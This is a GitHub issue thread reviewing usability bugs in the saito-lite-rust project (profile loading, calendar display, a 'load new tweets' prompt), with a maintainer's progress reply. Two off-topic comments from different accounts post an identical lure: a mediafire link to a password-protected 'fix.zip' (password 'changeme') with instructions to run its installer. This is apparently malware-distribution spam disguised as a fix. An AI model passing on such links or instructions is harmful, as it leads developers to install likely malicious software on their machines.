### ISSUE TITLE
RS Usability Review

### ISSUE THREAD

**Issue by f8daniel** [SaitoTech/saito-lite-rust#2578]
Profile appears broken if slow to load - loader needed.

Calendar should only show if you have a scheduled event?

![Image](https://github.com/user-attachments/assets/d09b5fdb-6db6-44d8-9921-d0a1a263488e)

Load new tweets shows when there are no tweets to load (or the tweets to load are loaded into the thread and the user cannot see them).

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by f8daniel** [comment]
Khan fixed the # 1,
I have a fix for # 3.

Moving # 2 to the ticket on improving the calendar

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
